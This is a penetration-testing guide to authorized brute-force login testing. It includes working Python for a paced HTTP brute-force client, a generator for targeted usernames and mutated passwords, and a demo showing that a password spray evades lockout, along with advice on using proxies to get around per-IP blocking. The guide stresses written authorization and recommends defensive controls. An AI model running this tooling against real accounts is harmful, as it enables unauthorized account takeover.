TL;DR
A brute-force test that fires requests as fast as the client can send them will overwhelm the target (a self-inflicted denial of service) or get the tester's IP blocked before anything useful is learned. This guide shows how to run authorized brute-force attempts responsibly: pace the requests, pick accounts and wordlists deliberately, watch how the target responds, and understand the defensive controls you will run into and should recommend, namely server-side throttling, account lockout and CAPTCHAs.
How to Brute Force Safely
- Understand the Risks: Before you start, remember that brute-forcing a system you are not authorized to test is illegal in most jurisdictions. This guide assumes you have explicit, written authorization (e.g., a penetration test with agreed scope and rules of engagement).
- Rate Limiting: The most important step! Limit how many requests you send per second or minute, and agree the ceiling with the system owner up front. A login endpoint can absorb a few requests per second; hundreds or thousands will degrade the service or trigger a block, and either outcome ends the test early.
- Implement in your script: Put a delay between attempts. Sleeping serialises the requests, so the rate is at most one per delay period:

```python
import time

for i in range(10):
    # Attempt login here...
    time.sleep(5)  # Wait 5 seconds between attempts
```

- Server-side rate limiting (best): This is the defensive counterpart. If you operate the server, enforce the limit there: reject or delay requests from a source that exceeds a threshold in a given window. Tools like fail2ban watch the authentication logs and block an IP after too many failed logins.
- Account Lockout Policies: On the defensive side, lock an account after a small number of consecutive incorrect attempts.
- This stops an attacker from trying every possible password against a single account. It does not stop password spraying, where one or two likely passwords are tried against many accounts, each staying under the threshold; and a lockout that is too aggressive lets an attacker lock legitimate users out on purpose.
- Lockout duration should be long enough to deter guessing but not so long that legitimate users are inconvenienced; temporary lockouts or progressively longer delays are the usual compromise.
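To make the two server-side controls concrete, here is an added example (not code from this guide or any particular product) of a minimal authentication service that enforces both a per-IP sliding-window rate limit and a per-account lockout. The policy values, the user table and the two attack sequences are all constructed for the demo; time is passed in as a parameter so nothing actually sleeps. The second run shows the caveat above: a password spray paced below the IP limit trips neither control and still finds the weak account.

```python
"""Server-side throttling plus account lockout, and what they do and do not stop.

Added example for this guide, not code from the page. Policy values, the user
table and the attack sequences are all constructed for the demo.
"""
from collections import defaultdict, deque

RATE_LIMIT = 5            # assumed: max login requests per IP per RATE_WINDOW
RATE_WINDOW = 60.0        # seconds
LOCKOUT_THRESHOLD = 3     # assumed: consecutive failures before the account locks
LOCKOUT_SECONDS = 900.0   # assumed: 15 minutes, deters guessing without stranding users

# Constructed user table; plaintext passwords only because this is a demo.
USERS = {"alice": "correct horse", "bob": "Winter2024!"}


class AuthService:
    def __init__(self):
        self.requests = defaultdict(deque)  # ip -> request timestamps still in window
        self.failures = defaultdict(int)    # username -> consecutive failed attempts
        self.locked_until = {}              # username -> time the lock expires

    def login(self, ip, username, password, now):
        """Return (status, message). `now` is injected so the demo needs no sleeping."""
        # 1. Per-IP sliding-window rate limit, evaluated before any account state.
        window = self.requests[ip]
        while window and now - window[0] > RATE_WINDOW:
            window.popleft()
        if len(window) >= RATE_LIMIT:
            return 429, "rate limited"
        window.append(now)

        # 2. Account lockout: refuse even a correct password while locked.
        # (423 is used here so the demo is readable; a production service would
        # usually answer 401 so callers cannot tell a locked account from a bad guess.)
        if self.locked_until.get(username, 0.0) > now:
            return 423, "account locked"

        # 3. Credential check. Unknown users fail the same way as bad passwords.
        if USERS.get(username) == password:
            self.failures[username] = 0
            return 200, "ok"
        self.failures[username] += 1
        if self.failures[username] >= LOCKOUT_THRESHOLD:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            self.failures[username] = 0
        return 401, "invalid credentials"


def single_account_attack(svc, ip, username, guesses):
    """One request per second against one account: lockout first, then the IP limit."""
    return [svc.login(ip, username, guess, now=float(i))[0]
            for i, guess in enumerate(guesses)]


def spray_attack(svc, ip, usernames, password, interval):
    """One password against many accounts, paced below the per-IP limit."""
    return [svc.login(ip, user, password, now=i * interval)[0]
            for i, user in enumerate(usernames)]


if __name__ == "__main__":
    # Hammering alice: three 401s lock the account, the correct password then
    # gets 423, and the sixth request in the minute trips the IP limit.
    print(single_account_attack(AuthService(), "10.0.0.1", "alice",
                                ["a", "b", "c", "d", "correct horse", "e"]))
    # Spraying one seasonal password every 15 s: no lockout, no 429, and bob falls.
    print(spray_attack(AuthService(), "10.0.0.2",
                       ["alice", "bob", "carol", "dave", "erin", "frank"],
                       "Winter2024!", interval=15.0))
```

The first run returns `[401, 401, 401, 423, 423, 429]`: the lockout blocks the right password once it is too late, and the rate limit only engages after the account is already locked. The second returns `[401, 200, 401, 401, 401, 401]`, which is why a report that recommends lockout should also recommend monitoring for failed logins spread across many accounts from one source.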
- CAPTCHAs: On the defensive side, put a CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) on the login form, ideally only after a few failures so ordinary users rarely see it.
- This makes it difficult for automated scripts to submit passwords at volume.
- Be aware that CAPTCHAs can be bypassed, for example via paid solving services or by finding an alternate login path (a mobile or legacy API) that does not enforce the challenge, but they add a significant hurdle. As a tester, check every login path, not just the form with the CAPTCHA.
- Use a Proxy (Carefully): Proxies distribute your requests across multiple IPs, which defeats per-IP blocking and lets you measure whether the target's controls are per-source or per-account.
- Be cautious: Free or low-quality proxies are often unreliable and may already be blacklisted, which skews your results.
- Ensure the proxy provider is reputable, and confirm that routing test traffic through third-party addresses is permitted under the rules of engagement; the source IPs you use should be known to the system owner so your traffic can be told apart from a real attack in their logs.
- Targeted Attacks: Instead of brute-forcing every username, focus on accounts that are likely to exist.
- Use a list of common usernames (e.g., admin, user, test, and service accounts such as backup or svc_*).
- Gather information about the target organization to identify real usernames (e.g., names from LinkedIn or the company website) and work out its login convention (first.last, flast and so on) from any address you can find.
- Password Lists: Use pre-made password lists rather than generating every combination.
- rockyou.txt, the roughly 14 million plaintext passwords leaked from the 2009 RockYou breach, is the usual starting point and ships with Kali Linux.
- Combine it with targeted information for better results (company name, product names, local sports teams, the current year), and prune candidates the target's password policy would reject anyway so the budget of attempts is spent on passwords that could actually exist.
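An added example (not code from this guide) of turning the two preceding items into candidates: usernames derived from a person's name via common login conventions, and a small targeted password list built from company-specific base words with case, leet, year and symbol variants, filtered against an assumed password policy. The names, base words and policy values are constructed for the demo.

```python
"""Targeted username and password candidates from public information.

Added example for this guide, not code from the page. Names, base words and
the password-policy assumptions are all constructed for the demo.
"""

LEET = str.maketrans("aeios", "43105")   # the substitutions people actually use


def username_candidates(full_name):
    """Common corporate login conventions for a 'First [Middle] Last' name."""
    parts = full_name.lower().replace(".", "").split()
    if not parts:
        return []
    if len(parts) == 1:                  # already a bare login like 'admin'
        return parts
    first, last = parts[0], parts[-1]
    conventions = [
        f"{first}.{last}",    # jane.doe
        f"{first}{last}",     # janedoe
        f"{first[0]}{last}",  # jdoe
        f"{first}{last[0]}",  # janed
        f"{last}{first[0]}",  # doej
        f"{first}_{last}",    # jane_doe
    ]
    return sorted(set(conventions))


def mangle(word, years, symbols=("", "!", "123")):
    """Case and leet variants of one base word, each with year and symbol suffixes."""
    forms = []
    for form in (word.lower(), word.capitalize(), word.upper(),
                 word.lower().translate(LEET)):
        if form not in forms:            # e.g. an all-consonant word has no leet form
            forms.append(form)
    return [f"{form}{year}{sym}" for form in forms for year in years for sym in symbols]


def meets_policy(pw, min_len=8, need_digit=True):
    """Drop candidates the target's (assumed) password policy would never have accepted."""
    return len(pw) >= min_len and (not need_digit or any(c.isdigit() for c in pw))


def build_wordlist(base_words, years=("", "2023", "2024"), min_len=8):
    """Ordered, de-duplicated, policy-filtered list from company-specific base words."""
    seen, out = set(), []
    for word in base_words:
        for pw in mangle(word, years):
            if pw not in seen and meets_policy(pw, min_len):
                seen.add(pw)
                out.append(pw)
    return out


if __name__ == "__main__":
    print(username_candidates("Jane Q. Doe"))
    print(build_wordlist(["Acme", "Springfield"]))
```

Order matters in a rate-limited test: put the variants you believe most likely (current year, single trailing symbol) first, because with lockout thresholds of three to five attempts per account you may only get to try the top few entries against each user.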
- Monitoring: Continuously watch how the target is coping. If the engagement gives you access to the server's metrics and logs, use them; otherwise your own client is the monitor: track response times and status codes for every attempt.
- Look for signs of overload or blocking: rising latency, timeouts, 429 or 503 responses, or an unexpected CAPTCHA or redirect.
- Back off when you see them and creep back towards the agreed rate once responses look healthy again; if the target keeps refusing despite backing off, stop and tell the system owner rather than keep hammering.
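The client-side pacing from the rate-limiting step and the monitoring step above fit together in one loop, shown here as an added example (not code from this guide): a pacer that doubles the delay on 429/503 or slow responses and slowly returns to the agreed base rate, and a runner that aborts after a run of refusals instead of continuing. The thresholds are assumed, the target is a constructed stand-in that replays fixed status codes, and `http_send` (with its URL and form field names) is only an assumed shape of a real sender.

```python
"""Paced brute-force client that watches the target and backs off.

Added example for this guide, not code from the page. The pacing thresholds are
assumed, the scripted target replays constructed status codes, and http_send
uses an assumed login URL and field names.
"""
import time
import urllib.error
import urllib.parse
import urllib.request


class Pacer:
    """Adaptive inter-request delay: double on throttling or slow responses,
    creep back towards the agreed base rate while the target looks healthy."""

    def __init__(self, base_delay=1.0, max_delay=60.0, latency_ceiling=2.0):
        self.base_delay = base_delay            # assumed: agreed in the rules of engagement
        self.max_delay = max_delay
        self.latency_ceiling = latency_ceiling  # seconds; slower than this means we hurt it
        self.delay = base_delay
        self.throttled = 0                      # 429/503 responses seen
        self.slow = 0                           # responses over the latency ceiling

    def observe(self, status, latency):
        """Feed one response in; returns the delay to sleep before the next request."""
        if status in (429, 503):
            self.throttled += 1
            self.delay = min(self.delay * 2, self.max_delay)
        elif latency > self.latency_ceiling:
            self.slow += 1
            self.delay = min(self.delay * 2, self.max_delay)
        else:
            self.delay = max(self.delay * 0.9, self.base_delay)
        return self.delay


def run(pacer, attempts, send, sleep=time.sleep, clock=time.monotonic, abort_after=5):
    """Try each (username, password) pair; stop early if the target keeps refusing.

    sleep and clock are injectable so the demo and its test run without waiting.
    """
    results, consecutive_refusals = [], 0
    for username, password in attempts:
        started = clock()
        status = send(username, password)
        latency = clock() - started
        results.append((username, password, status))
        delay = pacer.observe(status, latency)
        consecutive_refusals = consecutive_refusals + 1 if status in (429, 503) else 0
        if consecutive_refusals >= abort_after:
            break   # backing off did not help; stop hammering and report it
        sleep(delay)
    return results


def scripted_sender(statuses):
    """Constructed stand-in for the target: replays a fixed list of status codes."""
    remaining = iter(statuses)
    return lambda username, password: next(remaining, 401)


def http_send(url, username, password, timeout=10):
    """Real sender: form POST to an assumed login URL with assumed field names."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    try:
        with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code     # 401/429/503 are data for the pacer, not exceptions


if __name__ == "__main__":
    delays = []
    pacer = Pacer(base_delay=1.0)
    guesses = [("alice", f"guess{i}") for i in range(7)]
    target = scripted_sender([401, 401, 429, 429, 401, 401, 401])
    run(pacer, guesses, target, sleep=delays.append, clock=lambda: 0.0)
    print("delays used:", [round(d, 2) for d in delays])  # 1.0, 1.0, 2.0, 4.0, 3.6, ...
    print("throttled responses:", pacer.throttled)
```

In a real run, pass `functools.partial(http_send, login_url)` as `send` and leave `sleep` and `clock` at their defaults; the counters on the pacer (`throttled`, `slow`) are what you put in the report as evidence of how the target behaved under the agreed rate.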
- Ethical Considerations: Always obtain explicit, written permission before performing any security testing, including brute-force attempts, and stay within the agreed scope, rate and time window. Keep a timestamped log of what you sent from which addresses so your activity can be matched against the target's logs, and report any weaknesses you find (no lockout, no throttling, accounts with sprayable passwords) responsibly to the system owner.

